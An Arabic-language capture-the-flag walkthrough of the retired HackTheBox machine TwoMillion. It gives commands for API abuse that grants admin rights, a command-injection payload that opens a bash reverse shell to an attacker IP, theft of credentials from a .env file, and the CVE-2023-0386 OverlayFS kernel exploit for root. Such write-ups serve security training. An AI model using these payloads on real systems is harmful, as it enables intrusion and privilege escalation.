
شرح جهاز HackTheBox TwoMillion — إساءة استخدام API وحقن الأوامر وCVE-2023-0386
شرح جهاز HackTheBox TwoMillion — استغلال API، حقن الأوامر وCVE-2023-0386
| الحقل | التفاصيل |
|---|---|
| الاسم | TwoMillion |
| الصعوبة | سهل |
| نظام التشغيل | Linux |
| IP | 10.10.11.221 |
| CVE | CVE-2023-0386 |
TwoMillion هو جهاز Linux سهل يتمحور حول منصة HackTheBox القديمة. يتضمن فك تشفير رمز دعوة، واستغلال نقاط نهاية API، وحقن أوامر نظام التشغيل، واكتشاف بيانات الاعتماد، وتصعيد صلاحيات نواة Linux عبر CVE-2023-0386 (OverlayFS).
nmap -sV -sC -v 10.10.11.221
المنافذ المفتوحة:
2million.htbأضف إلى /etc/hosts:
echo "10.10.11.221 2million.htb" >> /etc/hosts
curl -X POST http://2million.htb/api/v1/invite/how/to/generate
الاستجابة مشفرة بـ ROT13. قم بفك تشفيرها:
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'
قم بتوليد رمز الدعوة:
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d
سجّل في http://2million.htb/register باستخدام رمز الدعوة الذي تم فك تشفيره.
سجّل الدخول عبر المتصفح، واحصل على PHPSESSID من ملفات تعريف الارتباط (F12 → Application → Cookies).
ارفع صلاحياتك إلى مسؤول:
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"email":"[email protected]","is_admin":1}'
تحقق:
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}
شغّل المستمع:
nc -lvnp 4444
أرسل حمولة الشل العكسي:
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'
تم استلام الشل بصلاحيات www-data.
ابحث عن بيانات الاعتماد في .env:
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123
ادخل عبر SSH:
ssh [email protected]
cat ~/user.txt
تحقق من التلميح:
cat /var/mail/admin
uname -r
# 5.15.70 — vulnerable to CVE-2023-0386
قم بتنزيل وتجميع الاستغلال على Kali:
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all
انقل إلى الهدف:
# Kali
python3 -m http.server 8000
# Target
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all
شغّل في محطتين على الجهاز الهدف:
المحطة 1:
./fuse ./ovlcap/lower ./gc
المحطة 2:
./exp
احصل على علم الجذر:
cat /root/root.txt
هذا الشرح لأغراض تعليمية فقط على جهاز HackTheBox المتقاعد.
| الخطوة | التقنية |
|---|
| الاستطلاع | فحص Nmap |
| رمز الدعوة | فك تشفير ROT13 + Base64 |
| تصعيد الصلاحيات عبر الويب | التلاعب بـ API → مسؤول |
| الشل الأولي | حقن أوامر نظام التشغيل |
| الحركة الجانبية | بيانات اعتماد .env → SSH |
| الجذر | استغلال CVE-2023-0386 OverlayFS |